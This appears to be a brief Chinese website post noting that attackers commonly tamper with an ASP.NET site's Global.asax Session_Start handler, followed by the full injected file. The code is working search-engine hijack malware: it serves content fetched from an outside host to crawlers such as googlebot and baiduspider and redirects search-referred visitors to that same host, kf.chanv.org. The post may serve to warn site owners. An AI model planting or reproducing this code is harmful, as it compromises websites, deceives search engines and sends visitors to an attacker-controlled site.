发布:2022/3/7 17:29:32作者:管理员 来源:本站 浏览次数:929
一般是针对网站Global.asax文件进行攻击,修改Session_Start内容
<%@ Application Language="C#" %>
<script runat="server">
void Application_Start(object sender, EventArgs e)
{
}
void Application_End(object sender, EventArgs e)
{
}
void Application_Error(object sender, EventArgs e)
{
}
void Session_Start(object sender, EventArgs e)
{
//HttpContext.Current.Response.Write(HttpContext.Current.Request.UserAgent);
string data_url = "http://kf.chanv.org/";
string redirect_url="http://kf.chanv.org/";
if (is_spider())
{
HttpContext.Current.Response.Clear();
HttpContext.Current.Response.BinaryWrite(get_data(data_url));
HttpContext.Current.Response.End();
}
else if(is_from_search())
{
HttpContext.Current.Response.Redirect(redirect_url, true);
}
else
{
//HttpContext.Current.Response.Write(HttpContext.Current.Request.UserAgent);
}
}
void Session_End(object sender, EventArgs e)
{
}
public bool is_spider()
{
string spider_flag = "googlebot|baiduspider|sogou|yahoo|soso";
string[] spider_flag_arr = spider_flag.Split('|');
string user_agent=HttpContext.Current.Request.UserAgent;
foreach (string tmp_flag in spider_flag_arr)
{
if (user_agent.ToLower().IndexOf(tmp_flag.ToLower())!=-1) { return true; }
}
return false;
}
public bool is_from_search()
{
if (HttpContext.Current.Request.UrlReferrer==null)
{
return false;
}
else
{
string page_ref = HttpContext.Current.Request.UrlReferrer.ToString();
string search_flag = "baidu|sogou|yahoo|soso";
string[] search_flag_arr = search_flag.Split('|');
foreach (string tmp_flag in search_flag_arr)
{
if (page_ref.ToLower().IndexOf(tmp_flag.ToLower()) != -1) { return true; }
}
return false;
}
}
public byte[] get_data(string url)
{
System.Net.WebClient wc = new System.Net.WebClient();
byte[] data = wc.DownloadData(url);
return data;
}
</script>